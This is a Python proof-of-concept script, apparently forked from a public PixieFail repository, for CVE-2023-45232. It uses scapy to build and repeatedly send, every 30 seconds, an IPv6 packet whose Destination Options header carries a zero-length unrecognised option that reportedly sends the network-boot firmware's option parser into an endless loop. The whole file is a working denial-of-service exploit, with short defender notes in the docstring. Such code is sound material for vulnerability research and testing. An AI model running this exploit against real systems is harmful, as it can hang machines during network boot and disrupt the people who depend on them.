forked from quarkslab/pixiefail
pixiefail-CVE-2023-45232.py
import struct
import argparse
import time
from scapy.packet import Raw
from scapy.layers.inet import UDP
from scapy.layers.inet6 import *
from scapy.all import send, sniff
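def send_packet_with_destination_option_header_bug_04(args):
    """Build and send one IPv6 packet reproducing the CVE-2023-45232 input.

    The packet is an IPv6 header followed by a Destination Options extension
    header that holds a single two-byte option: type 0x39, data length 0x00.
    The top two bits of the type (0x39 & 0xC0) are 00, which marks an
    unrecognised option that a receiver is expected to skip over. Per the
    original PoC notes, the affected parser never terminates on the zero
    length (presumably its offset advances by the length field alone, so it
    never moves past the option -- confirm against the firmware source).

    For defenders: the remedy is a firmware update carrying the fixed IPv6
    option parser. On segments used for network boot, a Destination Options
    header carrying an unknown option with zero data length is a candidate
    pattern to alert on (verify against normal traffic before enforcing).

    Args:
        args: Parsed CLI namespace. Reads ``src`` (may be None, which leaves
            source address selection to scapy), ``target`` and, when
            present, ``interface``.
    """
    # Next Header 60 = Destination Options follows the base IPv6 header.
    base_header = IPv6(src=args.src, dst=args.target, nh=60)

    # Option type 0x39, Opt Data Len 0x00: the "skip" action with no payload.
    zero_length_option = Raw(b'\x39\x00')

    # nh=59 is "No Next Header"; autopad=0 asks scapy to emit the option
    # bytes as given instead of appending padding options after them.
    options_header = IPv6ExtHdrDestOpt(nh=59, autopad=0, options=[zero_length_option])

    pkt = base_header / options_header
    pkt.show2()

    # The CLI requires --interface, but the original call ignored it and let
    # the routing table pick the egress NIC. Pin the send to the named
    # interface so the test packet only leaves on the intended lab link.
    # getattr keeps callers that pass a namespace without `interface` working.
    send(pkt, iface=getattr(args, 'interface', None))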
def main(args):
    """Resend the crafted packet every 30 seconds until the process is stopped.

    The loop has no exit condition of its own; it ends only when the script
    is interrupted.

    Args:
        args: Parsed CLI namespace, passed through unchanged to the sender.
    """
    notice = 'Sending packet with Destination Options header containing crafted unrecognized option and sleeping 30 seconds...'
    pause_seconds = 30
    while True:
        print(notice)
        send_packet_with_destination_option_header_bug_04(args)
        time.sleep(pause_seconds)
if __name__ == '__main__':
    # Script entry point: read the addressing parameters from the command
    # line, then hand the parsed namespace to main().
    parser = argparse.ArgumentParser(description="Proof of concept for CVE-2023-45232.")

    # (flag, required, help text) -- every option is a plain string.
    option_specs = (
        ('--src', False, 'Source IPv6 address to use'),
        ('--target', True, 'Target IPv6 address'),
        ('--interface', True, 'Name of the network interface to use'),
    )
    for flag, is_required, help_text in option_specs:
        parser.add_argument(flag, type=str, required=is_required, help=help_text)

    args = parser.parse_args()
    main(args)